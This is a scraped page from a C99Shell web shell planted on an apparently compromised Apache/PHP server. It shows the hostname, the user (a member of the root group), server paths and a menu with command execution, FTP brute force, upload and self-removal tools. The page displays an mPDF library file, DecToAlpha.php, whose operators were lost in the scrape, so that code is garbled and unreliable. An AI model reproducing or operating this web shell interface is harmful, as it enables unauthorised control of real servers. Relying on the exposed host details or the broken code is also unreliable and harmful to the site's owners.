!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/vendor/mpdf/mpdf/src/Conversion/   drwxr-xr-x
Free 25.28 GB of 117.98 GB (21.43%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     DecToAlpha.php (910 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Mpdf\Conversion;

class 
DecToAlpha
{

    public function 
convert($valor$toUpper true)
    {
        
// returns a string from A-Z to AA-ZZ to AAA-ZZZ
        // OBS: A = 65 ASCII TABLE VALUE
        
if (($valor 1) || ($valor 18278)) {
            return 
'?'//supports 'only' up to 18278
        
}

        
$c2 $c3 '';

        
$c1 64 $valor// 1 letter (up to 26)
        
if ($valor 702) { // 3 letters (up to 18278)
            
$c1 65 floor(($valor 703) / 676);
            
$c2 65 floor((($valor 703) % 676) / 26);
            
$c3 65 floor((($valor 703) % 676) % 26);
        } elseif (
$valor 26) { // 2 letters (up to 702)
            
$c1 = (64 + (int) (($valor 1) / 26));
            
$c2 = (64 + ($valor 26));
            if (
$c2 === 64) {
                
$c2 += 26;
            }
        }

        
$alpha chr($c1);

        if (
$c2 !== '') {
            
$alpha .= chr($c2);
        }

        if (
$c3 !== '') {
            
$alpha .= chr($c3);
        }

        if (!
$toUpper) {
            
$alpha strtolower($alpha);
        }

        return 
$alpha;
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0035 ]--